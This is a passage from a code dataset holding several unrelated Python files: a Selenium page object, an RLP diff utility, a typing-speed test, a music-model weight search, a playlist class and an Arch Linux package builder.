int(we.find_element(*locator_amount).text)}\n for we in self._we_side_bar_level_list]\n self.side_bar_category_data_list = [{'name': we.find_element(*locator_name).text,\n 'amount': int(we.find_element(*locator_amount).text)}\n for we in self._we_side_bar_category_list]\n self.side_bar_tag_data_list = [{'name': we.find_element(*locator_name).text,\n 'amount': int(we.find_element(*locator_amount).text)}\n for we in self._we_side_bar_tag_list]\n\n # 日期的自定义按钮\n _locator_top_date_custom = (By.XPATH, '//*[@id=\"bank-top-box\"]/ul/li[5]/div/p[5]')\n\n def click_top_date(self, type_):\n \"\"\"\n 设置查询的时间,按界面顺序从1编号\n :param type_: 编号数字\n :param from_:\n :param to_:\n :return:\n \"\"\"\n if type_ == 5:\n self._driver.find_element(*self._locator_top_date_custom).click()\n\n _locator_top_query_reset = (By.XPATH, '//*[@id=\"bodycontent\"]/div/div[2]/form/div[2]/div[1]/div[3]')\n\n def click_top_reset(self):\n \"\"\"\n 点击顶部的查询条件重置按钮\n :return:\n \"\"\"\n self._driver.find_element(*self._locator_top_query_reset).click()\n\n # 题型的除标签外的信息\n _locator_question_meta 
= (By.XPATH, '//*[@id=\"questionList\"]/li[1]/div/div[2]/div[1]/span[1]')\n\n _locator_question_list = (By.XPATH, '//*[@id=\"questionList\"]/li')\n\n def get_question_meta_data_list(self):\n \"\"\"\n 获取当前页面当前条件的所有试题的meta信息,比如题型,难度,分值等\n :return:\n \"\"\"\n data_list = []\n we_question_list = self._driver.find_elements(*self._locator_question_list)\n count = 0\n while True:\n for we in we_question_list[count:]:\n data = {}\n question_id = we.get_attribute('data-key')\n data['id'] = question_id\n meta = we.find_elements(By.XPATH, './div/div[2]/div[1]/span')\n # 使用innerText避免展开试题\n data['type'] = meta[0].get_attribute(\"innerText\").strip()\n data['points'] = meta[1].get_attribute(\"innerText\").strip()\n data['level'] = meta[2].get_attribute(\"innerText\").strip()\n if len(meta) == 4:\n data['category'] = meta[3].get_attribute(\"innerText\").strip()\n else:\n data['category'] = ''\n # //*[@id=\"questionList\"]/li[49]/div/div[2]/div[2]/span 标签\n we_tag_list = we.find_elements(By.XPATH, './div/div[2]/div[2]/span')\n if len(we_tag_list) != 0:\n data['tag'] = [we.get_attribute('innerText').strip() for we in we_tag_list]\n else:\n data['tag'] = []\n data_list.append(data)\n if len(we_question_list) == self.get_question_count():\n break\n count = len(we_question_list)\n self._driver.execute_script('window.scroll(0,document.body.scrollHeight)')\n we_question_list = self._driver.find_elements(*self._locator_question_list)\n\n return data_list\n\n _locator_search = (By.XPATH, '//*[@id=\"bodycontent\"]/div/div[2]/form/div[2]/div[1]/div[2]')\n\n def click_left_search(self):\n \"\"\"\n 点击顶部左边的搜索按钮\n :return:\n \"\"\"\n self._driver.find_element(*self._locator_search).click()\n # WebDriverWait(self._driver, 10).until(EC.presence_of_element_located((By.XPATH, r'//ul[2]/li/span')))\n\n _locator_question_count = (By.ID, 'dataCount')\n\n def get_question_count(self):\n \"\"\"\n 获取搜索的结果,注意:查询到结果,才更新当前的数量,所以,要等结果返回\n :return: 整数\n \"\"\"\n WebDriverWait(self._driver, 5).until(lambda _driver: self._driver.find_element(*self._locator_question_count).text != '')\n return int(self._driver.find_element(*self._locator_question_count).text)\n\n def click_right_side_item(self, key_, value_):\n \"\"\"\n 点击右侧的查询条件项\n :param key_: 项目类型,比如题型,难度\n :param value_: 对应项目的具体名字,比如多选题\n :return:\n \"\"\"\n if key_ == '题型':\n if self.get_flexible_text() == '查看更多':\n self.click_flexible()\n for i, v in enumerate(self.side_bar_type_data_list):\n if v['name'] == value_:\n self._we_side_bar_type_list[i].click()\n break\n elif key_ == '试题难度':\n for i, v in enumerate(self.side_bar_level_data_list):\n if v['name'] == value_:\n self._we_side_bar_level_list[i].click()\n break\n elif key_ == '类别':\n for i, v in enumerate(self.side_bar_category_data_list):\n if v['name'] == value_:\n self._we_side_bar_category_list[i].click()\n break\n elif key_ == '标签':\n for i, v in enumerate(self.side_bar_tag_data_list):\n if v['name'] == value_:\n self._we_side_bar_tag_list[i].click()\n break\n time.sleep(1)\n\n # 查看更多按钮\n _locator_type_list_flexible = (By.XPATH, '//*[@id=\"querytype\"]/div/div/a')\n\n def click_flexible(self):\n \"\"\"\n 点击查看更多按钮\n :return:\n \"\"\"\n # 等待loading 遮罩消失,才可以点击“more”按钮\n WebDriverWait(self._driver,5).until(EC.invisibility_of_element_located((By.XPATH,'/html/body/div[2]')))\n self._driver.find_element(*self._locator_type_list_flexible).click()\n\n # 等待动画效果结束\n WebDriverWait(self._driver, 2).until(EC.visibility_of_all_elements_located(self._locator_type_list_flexible))\n\n def get_flexible_text(self):\n \"\"\"\n 获取查看更多按钮的文字 
transition-screen-wrapper\n :return:\n \"\"\"\n return self._driver.find_element(*self._locator_type_list_flexible).text\n\n\n \n\n\n","sub_path":"pages/question_bank_page.py","file_name":"question_bank_page.py","file_ext":"py","file_size_in_byte":12208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"412660545","text":"from __future__ import absolute_import\n\nimport rlp\n\nfrom eth_utils import (\n to_tuple,\n)\n\n\n@to_tuple\ndef diff_rlp_object(left, right):\n if left != right:\n rlp_type = type(left)\n\n for field_name, field_type in rlp_type.fields:\n left_value = getattr(left, field_name)\n right_value = getattr(right, field_name)\n if isinstance(field_type, type) and issubclass(field_type, rlp.Serializable):\n sub_diff = diff_rlp_object(left_value, right_value)\n for sub_field_name, sub_left_value, sub_right_value in sub_diff:\n yield (\n \"{0}.{1}\".format(field_name, sub_field_name),\n sub_left_value,\n sub_right_value,\n )\n elif isinstance(field_type, (rlp.sedes.List, rlp.sedes.CountableList)):\n if tuple(left_value) != tuple(right_value):\n yield (\n field_name,\n left_value,\n right_value,\n )\n elif left_value != right_value:\n yield (\n field_name,\n left_value,\n right_value,\n )\n else:\n continue\n","sub_path":"evm/utils/rlp.py","file_name":"rlp.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"71631321","text":"# ToDo: Don't count incorrectly typed words\r\n\r\nimport keyboard as kb, win32api, winsound, random, time, tkinter as tk, winsound as ws\r\nfrom pynput import keyboard\r\n\r\ndef pickagain():\r\n global noofwords\r\n noofwords = int(input('No. of words? [Between 10 and 10000]: '))\r\n if not noofwords in range(10, 10001):\r\n print('Sorry ,invalid range. 
Pick again...\\n')\r\n pickagain()\r\n else:\r\n play()\r\n\r\ndef play():\r\n global i, incorrectct, remaining, starttime, endtime, incorrectchars\r\n specialchars = [\r\n 'alt_l', 'backspace', 'correct', 'ctrl_l', 'delete', 'end', 'enter', 'esc', 'home',\\\r\n 'insert', 'num_lock', 'page_down', 'page_up', 'print_screen', 'shift', 'shift_r',\\\r\n 'tab', 'f1', 'f12', 'f2', 'f3', 'f4', 'f5', 'f6', 'f7', 'f8', 'f9', 'f10', 'f11', '_',\r\n 'left', 'up', 'down', 'right', 'media_play_pause', 'media_volume_mute', 'media_volume_up', 'media_volume_down', None, 'cmd', 'caps_lock'\r\n '!', '@', '#', '$', '%', '^', '&', '*', '(', ')', '~', '`', '_', '+', '-', '+', '|', '\\\\', '/', '?', '\"', \"'\", '<', '>', ',', '.', ';', ':',\\\r\n '[', ']', '{', '}'\r\n ]\r\n\r\n with open(r\"D:\\AI Training Text Files\\Project Gutenberg's Frankenstein, by Mary Wollstonecraft (Godwin) Shelley.txt\", 'r', encoding = 'utf-8-sig') as f:\r\n content = f.read()\r\n alphacontent = ''.join(x for x in content if x.isalpha() or x == ' ' or x == '\\n').replace('\\n', ' ')\r\n words = alphacontent.split()\r\n\r\n words = [i for i in words if len(i) > 4]\r\n random.shuffle(words)\r\n out = ' _ '.join(words[:noofwords])\r\n\r\n sentence = out\r\n sentence = sentence.replace('\\n', ' ')\r\n print(sentence+'\\n')\r\n\r\n sentence = sentence.replace('_ ', '')\r\n words = sentence.split(' ')\r\n remainingwords = sentence.split()\r\n rawin = []\r\n remaining = list(sentence)\r\n incorrectct = 0\r\n incorrectchars = []\r\n\r\n i = remaining[0]\r\n wordtimes = []\r\n\r\n def on_press(key):\r\n global i, incorrectct, remaining, starttime, endtime\r\n try:\r\n k = key.char # single-char keys\r\n except:\r\n k = key.name # other keys\r\n if key == keyboard.Key.space:\r\n k = ' '\r\n rawin.append(key)\r\n if k == i: # correct key entered\r\n del remaining[0]\r\n if len(remaining) == len(sentence)-1:\r\n starttime = time.time()\r\n if k == ' ':\r\n wordtimes.append(time.time())\r\n del words[0]\r\n\r\n else: # incorrect key entered\r\n if not k in specialchars:\r\n incorrectct += 1\r\n incorrectchars.append(k)\r\n print('Incorrect \"'+k+'\" instead of '+i)\r\n try:\r\n i = remaining[0]\r\n except:\r\n i = sentence[-1]\r\n\r\n if remaining == [] or k == keyboard.Key.esc:\r\n wordtimes.append(time.time())\r\n endtime = time.time()\r\n words.pop()\r\n return False # stop listener\r\n\r\n listener = keyboard.Listener(on_press=on_press)\r\n listener.start() # start to listen on a separate thread\r\n listener.join() # remove if main thread is polling self.keys\r\n\r\n precision = 5\r\n worddurations = [(wordtimes[n]-wordtimes[n-1]) for n in range(1, len(wordtimes))]\r\n #print(worddurations)\r\n del worddurations[0] #Don't count duration to type the first word [discard this value]\r\n avgwordduration = sum(worddurations)/len(worddurations)\r\n\r\n TIME = endtime - starttime\r\n sTIME = (str(TIME).split('.')[0]+'.'+str(TIME).split('.')[1][:precision])\r\n\r\n CPS = len(sentence)/float(sTIME)\r\n sCPS = (str(CPS).split('.')[0]+'.'+str(CPS).split('.')[1][:precision])\r\n\r\n CPM = float(CPS)*60\r\n sCPM = (str(CPM).split('.')[0]+'.'+str(CPM).split('.')[1][:precision])\r\n\r\n WPM = CPM/5\r\n sWPM = (str(WPM).split('.')[0]+'.'+str(WPM).split('.')[1][:precision])\r\n\r\n print('\\n\\n')\r\n print('CPS:', sCPS)\r\n print('CPM:', sCPM)\r\n print('TIME TAKEN:', sTIME, 's')\r\n print('Incorrect attempts:', incorrectct)\r\n print('WPM', sWPM)\r\n\r\n print()\r\n print('Incorrect chars:', incorrectchars)\r\n\r\n 
#print(locals().keys())\r\n\r\npickagain()\r\n","sub_path":"Typing Test.py","file_name":"Typing Test.py","file_ext":"py","file_size_in_byte":4186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"555912610","text":"import os\nimport sys\nsys.path.insert(0, os.path.dirname(os.path.abspath(__file__)) + '/../..')\n\nfrom dataMaps import DataMaps,convert_note_to_time, align_matrix\nfrom eval_utils import compute_eval_metrics_frame, compute_eval_metrics_note\nfrom mlm_training.model import Model, make_model_param\nfrom mlm_training.utils import safe_mkdir\nfrom decode import decode, pad_x\nfrom create_weight_data import get_weight_data\nfrom train_weight_model import train_model\n\nimport glob\nimport pickle\nimport warnings\nimport gzip\n\nimport tensorflow as tf\nimport pretty_midi as pm\nimport numpy as np\n\nmodel_dict = {'model' : None,\n 'sess' : None}\n\nglobal_params = {'model_out' : None,\n 'step' : None,\n 'acoustic' : None,\n 'early_exit' : None}\n\ndata_dict = {'gt' : None,\n 'beam' : None,\n 'valid' : None}\n\ndef load_data_info(gt=None, beam=None, valid=None, model_path=None, n_hidden=256, step=None, model_out=\".\",\n acoustic='kelz', early_exit=0.001, diagRNN=False):\n global global_params\n global data_dict\n global model_dict\n\n if gt is not None:\n with gzip.open(gt, \"rb\") as file:\n data_dict['gt'] = pickle.load(file)\n\n if beam is not None:\n with gzip.open(beam, \"rb\") as file:\n data_dict['beam'] = pickle.load(file)\n\n data_dict['valid'] = valid\n\n model_param = make_model_param()\n model_param['n_hidden'] = n_hidden\n model_param['n_steps'] = 1 # To generate 1 step at a time\n if diagRNN:\n model_param['cell_type'] = \"diagLSTM\"\n\n # Build model object\n model_dict['model'] = Model(model_param)\n model_dict['sess'],_ = model_dict['model'].load(model_path, model_path=model_path)\n\n global_params['step'] = step\n global_params['model_out'] = model_out\n global_params['acoustic'] = acoustic\n global_params['early_exit'] = early_exit\n\n\nmost_recent_model = None\n\ndef get_most_recent_model():\n global most_recent_model\n return most_recent_model\n\n\ndef weight_search(params, num=0, verbose=False):\n print(params)\n sys.stdout.flush()\n\n gt = params[0]\n min_diff = params[1]\n history = int(params[2])\n num_layers = int(params[3])\n is_weight = params[4]\n features = params[5]\n\n history_context = 0\n prior_context = 0\n\n if len(params) > 6:\n history_context = params[6]\n prior_context = params[7]\n\n use_lstm = True\n if len(params) > 8:\n use_lstm = params[8]\n\n warnings.filterwarnings(\"ignore\", message=\"tick should be an int.\")\n\n max_len = 30\n section = [0, max_len]\n\n note_range = [21,109]\n note_min = note_range[0]\n note_max = note_range[1]\n\n # Load model\n model = model_dict['model']\n sess = model_dict['sess']\n\n # Get weight_model data\n pkl = data_dict['gt' if gt else 'beam']\n\n X = pkl['X']\n Y = pkl['Y']\n D = pkl['D']\n max_history = pkl['history']\n no_mlm = pkl['no_mlm'] if 'no_mlm' in pkl else False\n\n if np.max(D) < min_diff:\n print(\"No training data generated\")\n sys.stdout.flush()\n return 0.0\n\n data_points = np.where(D > min_diff)\n data_features = []\n\n if history > 0:\n data_features.extend(range(max_history - history, max_history))\n\n if features:\n data_features.extend(range(max_history, len(X[0]) - 2))\n\n data_features.append(-2)\n\n if use_lstm:\n data_features.append(-1)\n\n X = X[:, data_features]\n\n if prior_context + history_context > 0:\n X_new = 
np.zeros((X.shape[0], X.shape[1] + prior_context * 4 + 2 * history_context * history))\n\n for i in range(int(X.shape[0] / 88)):\n x_frame = X[88 * i : 88 * (i + 1), :]\n\n X_new[88 * i : 88 * (i + 1), :] = pad_x(x_frame, x_frame[:, -2], x_frame[:, -1], x_frame[:, :history], history, history_context, prior_context)\n\n X = X_new\n\n X = X[data_points]\n Y = Y[data_points]\n\n if len(X) == 0:\n print(\"No training data generated\")\n sys.stdout.flush()\n return 0.0\n\n # Train weight model\n print(\"Training weight model\")\n sys.stdout.flush()\n layers = []\n for i in range(num_layers):\n layers.append(5)\n\n weight_model = train_model(X, Y, layers=layers, weight=is_weight)\n\n global most_recent_model\n most_recent_model = {'model' : weight_model,\n 'history' : history,\n 'features' : features,\n 'weight' : is_weight,\n 'history_context' : history_context,\n 'prior_context' : prior_context,\n 'use_lstm' : use_lstm,\n 'no_mlm' : no_mlm}\n\n weight_model_name = \"weight_model.\"\n weight_model_name += \"gt\" if gt else \"b10\"\n weight_model_name += \"_md\" + str(min_diff)\n weight_model_name += \"_h\" + str(history)\n weight_model_name += \"_l\" + str(num_layers)\n if features:\n weight_model_name += \"_f\"\n weight_model_name += \"_hc\" + str(history_context)\n weight_model_name += \"_pc\" + str(prior_context)\n if not use_lstm:\n weight_model_name += \"_noLSTM\"\n if no_mlm:\n weight_model_name += \"_noMLM\"\n weight_model_name += \"_weight\" if is_weight else \"_prior\"\n weight_model_name += \".\" + global_params['step'] + \".\" + str(num) + \".pkl\"\n\n # Write out weight model\n with open(os.path.join(global_params['model_out'], weight_model_name), \"wb\") as file:\n pickle.dump(most_recent_model, file)\n\n results = {}\n frames = np.zeros((0, 3))\n notes = np.zeros((0, 3))\n\n for filename in glob.glob(os.path.join(data_dict['valid'], \"*.mid\")):\n print(filename)\n sys.stdout.flush()\n\n data = DataMaps()\n data.make_from_file(filename,global_params['step'],section,acoustic_model=global_params['acoustic'])\n\n # Decode\n pr, priors, weights, combined_priors = decode(data.input, model, sess, branch_factor=5,\n beam_size=50, weight=[[0.8], [0.2]],\n out=None, hash_length=12, weight_model=weight_model,\n verbose=verbose, weight_model_dict=most_recent_model)\n\n if global_params['step'] != \"time\":\n pr = convert_note_to_time(pr,data.corresp,data.input_fs,max_len=max_len)\n\n data = DataMaps()\n data.make_from_file(filename, \"time\", section=section, acoustic_model=global_params['acoustic'])\n target = data.target\n\n #Evaluate\n P_f,R_f,F_f = compute_eval_metrics_frame(pr,target)\n P_n,R_n,F_n = compute_eval_metrics_note(pr,target,min_dur=0.05)\n\n print(f\"Frame P,R,F: {P_f:.3f},{R_f:.3f},{F_f:.3f}, Note P,R,F: {P_n:.3f},{R_n:.3f},{F_n:.3f}\")\n sys.stdout.flush()\n\n frames = np.vstack((frames, [P_f, R_f, F_f]))\n notes = np.vstack((notes, [P_n, R_n, F_n]))\n\n if F_n < global_params['early_exit']:\n print(\"Early stopping, F-measure too low.\")\n sys.stdout.flush()\n return 0.0\n\n P_f, R_f, F_f = np.mean(frames, axis=0)\n P_n, R_n, F_n = np.mean(notes, axis=0)\n\n print(f\"Frame P,R,F: {P_f:.3f},{R_f:.3f},{F_f:.3f}, Note P,R,F: {P_n:.3f},{R_n:.3f},{F_n:.3f}\")\n print(str(F_n) + \": \" + str(params))\n sys.stdout.flush()\n return -F_n\n","sub_path":"weight_models_old/optim/weight_search.py","file_name":"weight_search.py","file_ext":"py","file_size_in_byte":7274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} 
+{"seq_id":"475737099","text":"import random\nfrom typing import Dict, List\n\nfrom src.music.track import Track\n\n\nclass TrackList:\n def __init__(self, config: Dict):\n \"\"\"\n Initializes a `TrackList` instance.\n\n The `config` parameter is expected to be a dictionary with the following keys:\n - \"name\": the name of the track list\n - \"directory\": the directory where the files for this track list are (Optional)\n - \"volume\": an integer between 0 (mute) and 100 (max) (Optional, default=100)\n - \"loop\": bool indicating whether to loop once all tracks have been played (Optional, default=True)\n - \"shuffle\": bool indicating whether to shuffle the tracks (Optional, default=True)\n - \"next\": name of the track list to play after this one finishes (Optional)\n - \"tracks\": a list of track configs. See `Track` class for more information.\n\n :param config: `dict`\n \"\"\"\n self.name = config[\"name\"]\n self.directory = config[\"directory\"] if \"directory\" in config else None\n self.volume = int(config[\"volume\"]) if \"volume\" in config else 100\n self.loop = config[\"loop\"] if \"loop\" in config else True\n self.shuffle = config[\"shuffle\"] if \"shuffle\" in config else True\n self.next = config[\"next\"] if \"next\" in config else None\n tracks = [Track(track_config) for track_config in config[\"tracks\"]]\n self._tracks = tuple(tracks) # immutable\n\n @property\n def tracks(self) -> List[Track]:\n \"\"\"\n Returns the tracks for this instance. This list is shuffled, if `shuffle` is set.\n \"\"\"\n tracks = list(self._tracks) # Copy since random will shuffle in place\n if self.shuffle:\n random.shuffle(tracks)\n return tracks\n\n def __eq__(self, other):\n if isinstance(other, TrackList):\n attrs_are_the_same = (\n self.name == other.name\n and self.directory == other.directory\n and self.loop == other.loop\n and self.shuffle == other.shuffle\n and self.volume == other.volume\n and self.next == other.next\n )\n if not attrs_are_the_same:\n return False\n if len(self._tracks) != len(other._tracks):\n return False\n for my_track, other_track in zip(self._tracks, other._tracks):\n if my_track != other_track:\n return False\n return True\n return False\n","sub_path":"src/music/track_list.py","file_name":"track_list.py","file_ext":"py","file_size_in_byte":2508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"89500185","text":"# -*- coding: utf-8 -*-\n# ----------------------------------------------------------------------\n# Copyright © 2012, RedJack, LLC.\n# All rights reserved.\n#\n# Please see the COPYING file in this distribution for license details.\n# ----------------------------------------------------------------------\n\nfrom __future__ import absolute_import\n\nimport collections\nimport os\nimport os.path\n\nimport buzzy.build\nimport buzzy.build.autotools\nimport buzzy.build.cmake\nimport buzzy.build.none\nimport buzzy.build.python\nimport buzzy.config\nimport buzzy.recipe\nimport buzzy.source\nimport buzzy.source.download\nimport buzzy.source.git\nimport buzzy.utils\nfrom buzzy.errors import BuzzyError\nfrom buzzy.log import log\n\nfrom buzzy.distro.arch.pkgbuild import *\n\n\narch = buzzy.utils.get_arch_from_uname()\npkgdest = None\nrepo_db = None\nrepo_files_db = None\n\n\n#-----------------------------------------------------------------------\n# General package functions\n\ndef is_native_package(package_name):\n return buzzy.utils.if_run([\"pacman\", \"-Si\", 
package_name])\n\n\n#-----------------------------------------------------------------------\n# Arch packages\n\nclass Arch(buzzy.yaml.Fields):\n def fields(self):\n yield \"native\", {\"default\": None}\n yield \"python\", {\"default\": None}\n\nclass Recipe(buzzy.recipe.Recipe):\n def fields(self):\n yield \"arch\", {\"custom\": Arch, \"default\": {}}\n\n\n#-----------------------------------------------------------------------\n# Native packages are easy\n\nclass NativePackage(buzzy.recipe.Package):\n def package_spec(self):\n return \"%s=%s\" % (self.package_name, self.recipe.version)\n\n def built(self):\n # Native packages are always built.\n return True\n\n def installed(self):\n return buzzy.utils.if_run([\"pacman\", \"-T\", self.package_spec()])\n\n def perform_build(self):\n # Nothing to build for a native package\n pass\n\n def perform_install(self):\n buzzy.utils.sudo([\"pacman\", \"-S\", \"--noconfirm\", self.package_spec()])\n\n\n#-----------------------------------------------------------------------\n# Built packages are hard\n\n# The directory that we build a package in.\ndef build_path(package_name):\n return os.path.join(buzzy.config.env.build_dir, package_name, \"build\")\n\nclass BuiltPackage(buzzy.recipe.Package):\n def __init__(self, package_name, recipe, tags, dep_tag):\n super(BuiltPackage, self).__init__(package_name, recipe, tags, dep_tag)\n self.build_path = build_path(package_name)\n self.pkgbuild = Pkgbuild(self)\n self.pkgbuild.add_producer(ArchPackageMetadata())\n self.pkgbuild.add_producer(ArchLicenseChecker())\n for source in recipe.sources:\n self.pkgbuild.add_producer(source)\n self.pkgbuild.add_producer(recipe.build)\n\n def package_filename(self):\n return \"%s-%s-%s-%s.pkg.tar.xz\" % \\\n (self.package_name, self.recipe.version, self.recipe.revision, arch)\n\n def package_path(self):\n return os.path.join(pkgdest, self.package_filename())\n\n def package_spec(self):\n return \"%s=%s-%s\" % \\\n (self.package_name, self.recipe.version, self.recipe.revision)\n\n def built(self):\n result = os.path.exists(self.package_path())\n if result:\n log(0, \"[%s] Package is already built\" % self.full_name)\n return result\n\n def installed(self):\n result = buzzy.utils.if_run([\"pacman\", \"-T\", self.package_spec()])\n if result:\n log(0, \"[%s] Package is already installed\" % self.full_name)\n return result\n\n def clean_build_path(self):\n buzzy.utils.rmtree(os.path.join(self.build_path, \"src\"))\n buzzy.utils.rm(os.path.join(self.build_path, self.package_filename()))\n\n def make_pkgbuild(self):\n self.pkgbuild.make(self)\n self.pkgbuild.write()\n\n def perform_build(self):\n log(0, \"[%s] Cleaning build directory\" % self.full_name)\n self.clean_build_path()\n log(0, \"[%s] Creating PKGBUILD file\" % self.full_name)\n self.make_pkgbuild()\n log(0, \"[%s] Building package\" % self.full_name)\n buzzy.utils.run([\"makepkg\", \"-s\", \"-f\"], cwd=self.build_path)\n log(0, \"[%s] Updating repository database\" % self.full_name)\n buzzy.utils.run([\"repo-add\", \"-d\", repo_db,\n self.package_path()])\n buzzy.utils.run([\"repo-add\", \"-d\", \"-f\", repo_files_db,\n self.package_path()])\n\n def perform_install(self):\n buzzy.utils.sudo([\"pacman\", \"-U\", \"--noconfirm\",\n self.package_path()])\n\n\n#-----------------------------------------------------------------------\n# Builders\n\ndef create_compiled_package(recipe):\n # For \"normal\" compiled packages, we trim off any subdirectories in the\n # recipe name to get the package name.\n package_name = 
os.path.basename(recipe.recipe_name)\n\n # The package is native if the recipe explicitly says so, or if there's a\n # package in the local Arch package database with the package's name. (The\n # recipe also override this check if there's a conflicting name.)\n\n if recipe.arch.native is None:\n # Nothing explicit in the recipe; check whether there's an Arch package\n # with this name.\n native = is_native_package(package_name)\n\n elif not recipe.arch.native:\n # Recipe explicitly says the package is not native.\n native = False\n\n elif isinstance(recipe.arch.native, str):\n # Recipe explicitly says the package is native.\n native = True\n package_name = recipe.arch.native\n\n else:\n raise BuzzyError(\"Unexpected value for arch.native in %s\" %\n recipe.recipe_name)\n\n # Instantiate the native or built package class.\n if native:\n return NativePackage(package_name, recipe, [\"default\"])\n else:\n return BuiltPackage(package_name, recipe, [\"default\"])\n\n\nclass Autotools(buzzy.build.autotools.Autotools):\n def create_packages(self, recipe):\n return [create_compiled_package(recipe)]\n\n def make_pkgbuild(self, package, pkgbuild):\n pkgbuild.list(\"options\").append(\"!libtool\")\n\n build = pkgbuild.code(\"build\")\n build.append(BUILD_CONFIGURE, './configure --prefix=/usr')\n build.append(BUILD_MAKE, 'make')\n\n package = pkgbuild.code(\"package\")\n package.append(INSTALL_STAGE, 'make DESTDIR=\"$pkgdir\" install')\n\n\nclass Cmake(buzzy.build.cmake.Cmake):\n def create_packages(self, recipe):\n return [create_compiled_package(recipe)]\n\n def make_pkgbuild(self, package, pkgbuild):\n pkgbuild.list(\"makedepends\").append(\"cmake\")\n\n build = pkgbuild.code(\"build\")\n build.append(BUILD_CONFIGURE, \"\"\"\n cmake_src=$(pwd)\n mkdir -p \"${startdir}/cmake-build\"\n pushd \"${startdir}/cmake-build\"\n cmake -DCMAKE_INSTALL_PREFIX=/usr \"${cmake_src}\"\n popd\n \"\"\")\n\n build.append(BUILD_MAKE, \"\"\"\n pushd \"${startdir}/cmake-build\"\n make\n popd\n \"\"\")\n\n package = pkgbuild.code(\"package\")\n package.append(INSTALL_STAGE, \"\"\"\n pushd \"${startdir}/cmake-build\"\n make DESTDIR=\"$pkgdir\" install\n popd\n \"\"\")\n\ndef python_prefix(python_version):\n if python_version == 2:\n return \"python2\"\n else:\n return \"python\"\n\n\ndef create_python_package(recipe, python_version):\n # For Python packages, we trim off any subdirectories in the recipe name to\n # get the package name's suffix. (The prefix is always \"python2-\" or\n # \"python-\".)os.path.basename(recipe.recipe_name)\n prefix = python_prefix(python_version)\n package_suffix = os.path.basename(recipe.recipe_name)\n package_name = \"%s-%s\" % (prefix, package_suffix)\n\n # The package is native if the recipe explicitly says so, or if there's a\n # package in the local Arch package database with the package's name. 
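is_native_package checks this by shelling out to pacman -Si. 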
(The\n # recipe also override this check if there's a conflicting name.)\n\n if recipe.arch.native is None:\n # Nothing explicit in the recipe; check whether there's an Arch package\n # with this name.\n native = is_native_package(package_name)\n\n elif not recipe.arch.native:\n # Recipe explicitly says the package is not native.\n native = False\n\n elif isinstance(recipe.arch.native, str):\n # Recipe explicitly says the package is native.\n native = True\n package_suffix = recipe.arch.native\n package_name = \"%s-%s\" % (prefix, package_suffix)\n\n else:\n raise BuzzyError(\"Unexpected value for arch.native in %s\" %\n recipe.recipe_name)\n\n # The Python 3 package is the default for non-Python packages that list this\n # as a dependency.\n version_tag = \"python%s\" % python_version\n if python_version == 3:\n tags = [version_tag, \"default\"]\n else:\n tags = [version_tag]\n\n # Instantiate the native or built package class.\n if native:\n return NativePackage(package_name, recipe, tags, version_tag)\n else:\n return BuiltPackage(package_name, recipe, tags, version_tag)\n\n\nclass Python(buzzy.build.python.Python):\n def create_packages(self, recipe):\n return [\n create_python_package(recipe, 3),\n create_python_package(recipe, 2),\n ]\n\n def make_pkgbuild(self, package, pkgbuild):\n python_package = package.package_name.split(\"-\")[0]\n script_suffix = python_package.replace(\"python\", \"\")\n pkgbuild.list(\"depends\").append(python_package)\n\n if self.installer == \"distutils\":\n # No extra dependencies\n pass\n elif self.installer in [\"setuptools\", \"distribute\"]:\n pkgbuild.list(\"depends\").append(\"%s-distribute\" % python_package)\n\n package = pkgbuild.code(\"package\")\n package.append(INSTALL_STAGE, \"\"\"\n %s setup.py install --root=\"$pkgdir/\" --optimize=1\n \"\"\" % python_package)\n\n if script_suffix != \"\":\n package.append(INSTALL_STAGE, \"\"\"\n for c in \"$pkgdir/usr/bin/\"*; do\n mv \"${c}\" \"${c}%s\"\n done\n \"\"\" % script_suffix)\n\n\n#-----------------------------------------------------------------------\n# Sources\n\nclass Download(buzzy.source.download.Download):\n def make_pkgbuild(self, package, pkgbuild):\n pkgbuild.list(\"source\").append(self.url)\n pkgbuild.list(\"md5sums\").append(self.md5)\n\n build = pkgbuild.code(\"build\")\n build.append(BUILD_CD, 'cd \"$srcdir/%s\"' % self.extracted)\n\n package = pkgbuild.code(\"package\")\n package.append(INSTALL_CD, 'cd \"$srcdir/%s\"' % self.extracted)\n\n\nclass Git(buzzy.source.git.Git):\n def make_pkgbuild(self, package, pkgbuild):\n pkgbuild.list(\"makedepends\").append(\"git\")\n\n if self.deep:\n git_args = \"\"\n else:\n git_args = '--depth 1 --branch \"%s\"' % self.commit\n\n if self.branch is None:\n self.full_commit = self.tag\n else:\n self.full_commit = \"origin/\\\"%s\\\"\" % self.branch\n\n build = pkgbuild.code(\"build\")\n build.append(BUILD_UNPACK, \"\"\"\n rm -rf \"${srcdir}/%(repo_name)s\"\n cd \"${srcdir}\"\n git clone \"\"\"+git_args+\"\"\" \"%(url)s\"\n cd \"${srcdir}/%(repo_name)s\"\n git checkout -b buzzy-build %(full_commit)s\n \"\"\", self)\n\n package = pkgbuild.code(\"package\")\n package.append(INSTALL_CD, 'cd \"$srcdir/%s\"' % self.repo_name)\n\n\n#-----------------------------------------------------------------------\n# Basic package metadata\n\nclass ArchPackageMetadata(object):\n def make_pkgbuild(self, package, pkgbuild):\n pkgbuild.list(\"arch\").append(arch)\n pkgbuild.scalar(\"pkgname\").set(package.package_name)\n 
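# the recipe's version/revision map onto Arch's pkgver/pkgrel\n 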
